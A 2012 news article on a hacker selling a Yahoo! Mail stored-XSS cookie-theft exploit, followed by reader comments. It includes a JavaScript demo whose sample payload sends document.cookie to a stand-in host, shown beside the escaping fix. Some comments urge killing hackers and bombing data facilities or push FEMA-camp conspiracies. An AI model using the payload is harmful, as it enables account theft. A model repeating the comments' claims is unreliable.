If You Have a Yahoo! Email Account and Value Your Privacy, You Will Want to Read This

A hacker is selling an exploit for a Yahoo! Mail flaw that lets an attacker steal a victim's session cookies and take over the account, typically after luring the victim into clicking a link. Other criminals will have to pay to learn how the attack works. The cost: $700.

Brian Krebs reported last week on his blog, Krebs on Security, that an Egyptian hacker was offering the deal on an “exclusive cybercrime forum” called Darkode. The exploit steals the cookies Yahoo! uses to keep a user signed in; with those, Krebs explains, an attacker can get into the target’s account and read or send email. Here’s how the hacker, who goes by “The Hell”, advertised the exploit, according to Krebs:

“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers. And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!”

Screenshot from the hacker’s video demo of the exploit. (Image: YouTube screenshot)

Krebs explains how this class of attack, cross-site scripting (XSS), works:

In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed, and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

“The Hell” also posted a video to show how it works, which Krebs reproduced and posted on YouTube.

Krebs writes that he contacted Yahoo! to alert them to the problem and was told the vulnerability would be relatively easy to fix.

“Fixing it is easy, most XSS are corrected by simple code change,” Ramses Martinez, director of Yahoo! security, said to Krebs. “Once we figure out the offending URL we can have new code deployed in a few hours at most.”

Until that URL is identified and patched, Krebs noted, the flaw is a reminder to be careful about clicking links sent by strangers or links that arrive in odd-looking messages.
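Krebs’s description of cookie theft through XSS and Martinez’s remark that most XSS is corrected by a simple code change are easiest to see side by side. The following is an added example, not code from the article, from Krebs’s post or from Yahoo!: a toy Node.js webmail renderer with a constructed cookie-stealing payload, the escaping fix, and a check of which cookies a page script could read given a server’s Set-Cookie headers. The collector hostname, the cookie names and all function names are assumptions made for illustration.

```javascript
// Added example (not from the article, Krebs's post or Yahoo!): a toy
// webmail renderer showing why a *stored* XSS payload fires for every
// reader and how two server-side changes blunt it. Names, hostnames and
// the sample payload are constructed for illustration only.

// Constructed attacker message: a broken image whose onerror handler sends
// document.cookie to a collector the attacker controls. The hostname is a
// placeholder, not a real endpoint.
const ATTACKER_BODY =
  '<img src="x" onerror="new Image().src=\'https://collector.example/?c=\'+encodeURIComponent(document.cookie)">';

// In-memory mailbox standing in for the provider's message store. A stored
// payload persists here and is replayed to every reader, which is why the
// reflected-XSS filters in IE and Chrome (they compare the response against
// the current request URL) have nothing to match on.
const mailbox = [];
function storeMessage(from, subject, body) {
  mailbox.push({ from, subject, body });
  return mailbox.length - 1;
}

// Vulnerable: the untrusted message body is interpolated straight into HTML.
function renderVulnerable(id) {
  const m = mailbox[id];
  return `<div class="msg"><b>${m.from}</b>: ${m.subject}<p>${m.body}</p></div>`;
}

// Fix: encode every untrusted value for the HTML text context it lands in.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
function renderSafe(id) {
  const m = mailbox[id];
  return `<div class="msg"><b>${escapeHtml(m.from)}</b>: ${escapeHtml(m.subject)}<p>${escapeHtml(m.body)}</p></div>`;
}

// Static check for this demo: does the rendered HTML still contain a real
// <script> tag or a tag carrying an on* event handler? Escaped text like
// "&lt;img ... onerror=" has no '<', so no tag can start there.
function containsExecutableMarkup(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Second layer: cookies flagged HttpOnly never appear in document.cookie,
// so a cookie-stealing payload reads nothing useful. Given the Set-Cookie
// headers a server emits, return the cookie names a page script could read.
function cookiesVisibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(';').map((p) => p.trim()))
    .filter((parts) => !parts.slice(1).some((p) => p.toLowerCase() === 'httponly'))
    .map((parts) => parts[0].split('=')[0]);
}

// Constructed header sets: the weak one leaves the session cookie readable.
const WEAK_HEADERS = ['SID=abc123; Path=/; Secure', 'lang=en; Path=/'];
const HARDENED_HEADERS = ['SID=abc123; Path=/; Secure; HttpOnly', 'lang=en; Path=/'];

const demoId = storeMessage('mallory@example.net', 'hi', ATTACKER_BODY);
console.log('vulnerable render executes payload:', containsExecutableMarkup(renderVulnerable(demoId)));
console.log('escaped render executes payload:   ', containsExecutableMarkup(renderSafe(demoId)));
console.log('cookies readable by script, weak:    ', cookiesVisibleToScript(WEAK_HEADERS));
console.log('cookies readable by script, hardened:', cookiesVisibleToScript(HARDENED_HEADERS));
```

Run it with `node`. The vulnerable renderer replays the payload to every reader of the stored message, which is why the seller could boast that the IE and Chrome XSS filters were no obstacle: those filters looked for attack strings reflected from the current request, not for markup already sitting in the provider’s database. Marking the session cookie HttpOnly keeps it out of `document.cookie`, but that only defeats this particular payload; script running in the victim’s Yahoo! session can still issue same-origin requests to read or send mail, so output encoding is the actual fix and HttpOnly is the backstop.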

Read more details about the exploit in Krebs’s post here.

(H/T: SlashGear)

Comments (58)

  • Insert Clever Username Here
    Posted on November 27, 2012 at 5:27pm

    it’s called clickjacking, and it’s been around almost as long as clicking. sad that people are so technologically illiterate that rudimentary script kiddie tricks are considered “hacking”.

    • gosutag
      Posted on November 27, 2012 at 6:14pm

      What don’t understand is that once you get even a step away from a GUI common folk become extremely confused... Mind you, scripting isn’t even a step away from the GUI. Maybe it’s getting worse?

    • C. Schwehr
      Posted on November 27, 2012 at 7:43pm

      I get crap like that fairly often….just don’t click on anything that you don’t recognize and you’ll be safe.

  • gapch12
    Posted on November 27, 2012 at 4:32pm

    People who click on links within e-mails from someone they do not know deserve to be hacked.

    • GatorBob
      Posted on November 27, 2012 at 5:21pm

      Your statement is preposterous, inconsiderate, elitist and typical of someone who has learned a little about something, in this case e-mail.

      There are beginners and elderly people for whom e-mail is a great comfort, and it keeps them in contact with friends and family. Those people will learn things like not opening unknown e-mail, but I seriously doubt that the first time you used e-mail you knew not to open unknown e-mail.

      People like you who are insecure and anxious to make themselves look smarter than they actually are make negative statements like the one you made. To do so is ignorant and childish.

    • gosutag
      Posted on November 27, 2012 at 6:15pm

      @GATORBOB: Thank you for the much needed dose of sanity.

  • KevINtampa
    Posted on November 27, 2012 at 3:57pm

    The way this article ends made me chuckle a bit. Can anyone guess why?

    “Until that URL is identified, Krebs noted that the vulnerability serves to remind users to be careful when clicking on links from strangers or that are in odd messages.

    Read more details about the exploit in Krebs post [here].”

    • Noah_fing-whey
      Posted on November 27, 2012 at 6:31pm

      It asks the really stupid Internet users that Gator Snob is so worried about to click on a link. LOL

      Gator Bob needs to give out his email address so people can forward questionable emails to him for review. The world is a dangerous place. If you go wandering around in the dark in a strange neighborhood you should expect problems. Clicking on a link from a stranger is the same as asking a stranger to hold your purse while you go into the toilet stall. You deserve what you get.

  • loneindividual
    Posted on November 27, 2012 at 3:40pm

    Having a conversation with the person who hacked you is fun.

    They are full of information. Once they realize your politics, they leave you alone….most of the time.

    • Lt_Scrounge
      Posted on November 27, 2012 at 7:20pm

      If I got hold of the twits who caused my system to crash, I don’t think they’d find it all that entertaining. Painful might be the manner in which they would describe my method of introducing them to a medieval reenactor’s idea of “hacking” involving a battle axe.

  • Delores at CH WV
    Posted on November 27, 2012 at 3:11pm

    Well, he probably didn’t have to hack as our government is probably selling the email addresses on the world’s black market. There is no government agency that has any honor or cares about American Privacy. As the World turns . . . our new nightmare life churns towards the end because of the UN.

  • dnha14
    Posted on November 27, 2012 at 1:57pm

    This is why my Yahoo address is given to people who I don’t want to have my e-mail address.

  • mrmikejohnson
    Posted on November 27, 2012 at 1:17pm

    There are still people who click on links from unknown senders? I thought people figured out that was a bad idea around 1998.

  • independentvoteril
    Posted on November 27, 2012 at 12:59pm

    Yahoo is one of the WORST at keeping hackers from stealing... this is especially true when it comes to your contact list... I wiped mine out long ago and got a Hotmail one for family and friends... the only thing I use my Yahoo account for is to sign up at comment boards....

  • archangel72
    Posted on November 27, 2012 at 11:40am

    I use Thunderbird email by Mozilla. It’s great and it’s simple. I use StartPage.com and Duck Duck Go as my search engine and Mozilla Firefox as my browser. Much more secure and there are tons of add ons for privacy.

  • americathebankrupt
    Posted on November 27, 2012 at 11:10am

    Go to Internet Options in your browser. Click on Security, Advanced, Allow session cookies, Block third-party cookies.

    • archangel72
      Posted on November 27, 2012 at 11:38am

      I actually use Thunderbird email from Mozilla. Also, I search using “Startpage.com” as my primary search engine. DuckDuck Go is also another search engine that doesn’t track you.

  • AquaBuddha
    Posted on November 27, 2012 at 10:42am

    Yahoo blows anyway. I have my email there and I really hope they go bankrupt. They are just another leftwing appliance.

    • JRook
      Posted on November 27, 2012 at 10:56am

      If you value your privacy you will pay attention to the 22+ third-party tracking cookies that are loaded by this site. Now why would a third-party marketing company pay a site to load tracking cookies? As GB says often, don’t take my word for it, figure it out yourself. Particularly what it says about the company and individuals who operate the site.

    • M13
      Posted on November 27, 2012 at 1:42pm

      Once again jrook shows us what an idiot and a liar he is.

    • Atrum Angelis
      Posted on November 27, 2012 at 2:49pm

      M13: While I have no idea of JROOK’s other comments which would make him a liar, there are in fact about two dozen trackers on this site. I get a warning every time I visit the site saying X amount of trackers blocked by my addon in Firefox. Most sites nowadays have at least a dozen or so.

    • 4theThinMan
      Posted on November 27, 2012 at 3:45pm

      So, stupid, why do you have your email there?

  • teawithjill
    Posted on November 27, 2012 at 10:34am

    Maybe the Blaze should set up an e-mail service I would pay for protecting my privacy, and be with a great bunch of people??

  • MrKnowItAll
    Posted on November 27, 2012 at 10:27am

    So Much COMMON SENSE coming to Light. YET! So many still don’t get it. I feel they never will……”Nothing In LIFE is FREE!”

  • TruckerClockWhoWantsIT
    Posted on November 27, 2012 at 10:24am

    All Hackers should be Hung by their Gunny Sack.

  • PingPongPing
    Posted on November 27, 2012 at 10:16am

    good lord. I guess i better activate the email account that my internet provider is giving me.

  • EARTHWALKER
    Posted on November 27, 2012 at 10:12am

    I found a good email and they have free or pay email at Hushmail

  • sizzlinsexybeckster
    Posted on November 27, 2012 at 10:07am

    ….. No, no, no…. this is not only about spam! They also keep track of the websites you visit – such as this one and they can find out your username here and see what you are typing to use it against you in any corrupt way they can… they can even take away your children if you say something so simple as “I like beer.” They will pretend you are an alcoholic and a wife beater even if you don’t even have a wife. These people in government we are having to deal with are monsters, liars, and just plain creepy. They keep copies of what you say and will distort your words – anything – for their reasons to perhaps “save you” and send you to “fat camp” or shove you into the Fema camps, you know, “for your protection” or whatever the hell crap they feel like making up just for their own sadistic thrills. DO NOT use yahoo, hotmail (all free emails) ALSO… DO NOT… use those emails such as AOL or anything your internet server provides you with… I’ve already heard stories about AOL and that’s not a free service, well, perhaps “free” if you pay for their internet connection. AOL sells your personal crap as well. Yes those emails get scanned. Why can’t someone from the military “accidentally” blow up the huge storage facilities where they store our personal crap. I believe that would be the start of our own human rights revolution to be treated with respect. Hey… I’ll chip in a dollar…

  • searcher619
    Posted on November 27, 2012 at 10:00am

    Meh… Yahoo is one of my junk email accounts. No way would I use a free email as a primary.

  • sizzlinsexybeckster
    Posted on November 27, 2012 at 9:56am

    I have since cancelled all my yahoo accounts and advise people to sign up for Reagan.com where you are considered a person and not just cattle and they respect your privacy, don’t sell anything or be nosy idiots… well, they do sell jelly beans at their store if you want to buy some (cute!), but never sift through your account. I highly suggest deleting all your free emails YESTERDAY and signing up there because you and your privacy are much more than worth it. Other people are really careless and don’t think they have anything of importance to be stolen but they are wrong. You may also be able to get an email address at GoDaddy.com however the Reagan site uses GoDaddy….. and there’s that bonus of jelly beans! Except I always suggest just speaking to people in person and avoiding all this electrical crap. Speaking of electrical… I believe the ovens in the FEMA camps do NOT require electricity – guess they have done their homework with their timing, you know, after the electric goes out for their ” ‘estimate’ of 3 years” they will try to round us up during this time to burn, no electric so there will be no news outlet to report from – unless theBLAZE PURCHASES one of those radio stations on those ‘emergency radios’ you buy from Lehmans or Walmart…. hint, hint. Otherwise when we tune in we’ll only hear lies like they did back in Hitler’s day.

  • ArmedAndReallyPissed
    Posted on November 27, 2012 at 9:52am

    Anytime these friggin hackers get caught, they should get life in prison without the chance of parole. Thanks for the advice about reagan.com email. Will look into it.

    • Old Ogre
      Posted on November 27, 2012 at 10:37am

      Then you will be paying them for their crimes for life… I am starting to think prisoners have it good compared to many Americans right now, well except for the being someones bitch thing!!

    • armyofnibiru
      Posted on November 27, 2012 at 12:22pm

      problem is they go right into the white house and are used as weapons against U.S.

    • 4theThinMan
      Posted on November 27, 2012 at 3:51pm

      line them up and shoot them right between the eyes. As long as you pussyfoot around with criminals – they are in business. DEATH stops crime.

  • mom4times
    Posted on November 27, 2012 at 9:45am

    @NHWINTER I only wish I could afford reagan.com right now….maybe next year

  • DivisionByZero
    Posted on November 27, 2012 at 9:31am

    Yahoo mail, gmail, and hotmail are all anti privacy. It may be a good time to dump these clowns and find a reputable email provider. Preferably a local provider that offers encrypted email and a good privacy policy. Finally, don’t put private or sensitive info in an email. It is effectively recorded “forever”, and available to anyone with a subpoena and an agenda.

  • B-45
    Posted on November 27, 2012 at 9:16am

    I am sure this will be fixed soon, but by the same token, perhaps now would be a good time for everyone to find alternative e-mail sources, and ditch Yahoo and their hard-left rhetoric drivel.

  • GrayPanther
    Posted on November 27, 2012 at 9:14am

    OMG! I have over 1,400 scam e-mails in my yahoo account due to a Walmart $1,000 shopping spree offered on my Walmart receipt. Only solution; open another account with another provider like Google.

    • NHwinter
      Posted on November 27, 2012 at 9:24am

      I recommend reagan.com, no spam, no advertisements, completely protected. It is only $40 a year. I had yahoo and got so much spam and obnoxious email that I cancelled that account. Google is in the pocket of Obama.

    • ExpertShot
      Posted on November 27, 2012 at 9:38am

      I’m with NHWINTER on this, I went with the reagan e-mail & absolutely no spam, it’s well worth the money. I still have my yahoo but only as an e-mail to sign into various sites, such as this. All my sensitive information goes to reagan.

    • csbaby
      Posted on November 27, 2012 at 9:42am

      Use the internet provider email, the one you get with who you pay – .att.net, cox.net, etc

    • NOT A CRAZY
      Posted on November 27, 2012 at 9:48am

      There are easy solutions to get rid of spam on Yahoo. First, whenever you get a spam email do not open any links in that email. Identify it as spam and it will be sent to a spam folder. It doesn’t take very long to get to the point where you no longer (very rarely) get spam emails in your main Inbox. You should also be careful about not generating spam in the first place. Every single time you enter your email in a database for someone to contact you, you have potentially started a spam trail. I have an extra email account that I use for oddball stuff that I need an email for but that I am leery of. I utilize that email if it is something I don’t want repeated contacts with. Google is in B.O.’s pocket.

    • llotus
      Posted on November 27, 2012 at 2:27pm

      Graypanther….I have learned to never go to a site for anything pushed by a store. Even sears pennys etc. The walmart one has to be an outright scam. Pushed by the clerks at checkout. Reagan is good. Lotus.

  • mom4times
    Posted on November 27, 2012 at 9:08am

    oh great…….been hacked enough as it is from them

    • EARTHWALKER
      Posted on November 27, 2012 at 10:11am

      I found a good email that is free or they have paid ones too; it is called Hushmail

    • Schteveo
      Posted on November 27, 2012 at 7:27pm

      As a retired computer type who still does work on the side, here’s your best bet on staying safe from scammers, hackers and phishermen.

      NEVER, ever, EV – ER, never open ANY e-mail unless you recognize the SENDER!

      Opening e-mails from unknown senders is a great way to get your computer infected, or hacked, by thieves and people who just want to be malicious. Opening e-mails from unknown senders is like opening the door on your house at 3AM, after looking through the peephole, seeing a guy wearing a ski mask and thinking, “…I wonder who that is?” Then deciding, ” Hey, it might be Ed McMahon, so I better open the door and see if I WON the $$$$!!”

      Let’s face it, you’re not going to win the Bolivian National Lottery if you don’t even know WHERE Bolivia is, there is no lost relative with $50M in a Nigerian Bank that you can get for sending them $$$ for ‘fees’, and MicroSoft is NOT in business to be giving away $$$ to you for reading or sending e-mails. There are no more REAL get-rich-quick opportunities in your e-mail than there are in your snail mail, so DON’T open anything promising you instant riches! And finally, there are sites that are especially bad for loading junk and cookies too. nroP and game sites are some of the worst offenders! Especially ones that advertise as “FREE!!”.

      P.S.
      to all the people who paid us to reload their computers last year, after being told NOT to do all that stuff above, but who did anyway, our mortgage company thanks
